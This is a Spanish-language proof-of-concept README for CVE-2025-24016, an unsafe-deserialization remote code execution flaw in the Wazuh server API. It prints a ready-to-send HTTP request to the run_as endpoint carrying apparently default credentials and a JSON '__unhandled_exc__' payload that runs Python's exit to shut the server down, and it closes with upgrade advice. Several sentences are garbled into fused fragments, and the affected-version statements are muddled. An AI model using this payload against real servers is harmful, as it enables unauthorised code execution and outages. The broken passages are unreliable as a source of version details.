
CVE-2025-24016: RCE en el servidor Wazuh! Ejecución remota de código
Este repositorio demuestra la vulnerabilidad de ejecución remota de código (RCE) en el servidor Wazuh, introducida por una deserialización insegura en el paquete wazuh-manager. La vulnerabilidad permite a atacantes remotos con acceso a la API (panel comprometido, servidores Wazuh en el clúster o ciertas configuraciones con agentes comprometidos) ejecutar código arbitrario en el servidor.
wazuh-manager versión >= 4.4.0>= 4.9.1La vulnerabilidad se produce en la API de Wazuh, donde los parámetros de DistributedAPI se serializan como JSON y se deserializan usando as_wazuh_object en el archivo framework/wazuh/core/cluster/common.py. Un atacante puede explotar esta vulnerabilidad inyectando un diccionario sin sanitizar en las solicitudes DAPI, lo que puede llevar a la evaluación de código Python arbitrario.
El RCE se puede desencadenar mediante el endpoint run_as, que permite al atacante controlar el argumento auth_context. Al elaborar una solicitud maliciosa, se puede ejecutar código arbitrario en el servidor maestro.
Para desencadenar esta vulnerabilidad usando la API del servidor, siga los pasos a continuación.
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-).__unhandled_exc__ que desencadena la ejecución de código Python arbitrario (exit en este caso).>= 4.4.0 hasta 4.9.0 (aún no corregidas).exit, lo que provoca el cierre del servidor Wazuh.Para proteger sus sistemas, actualice a la versión >= 4.9.1 de Wazuh, donde este problema está corregido.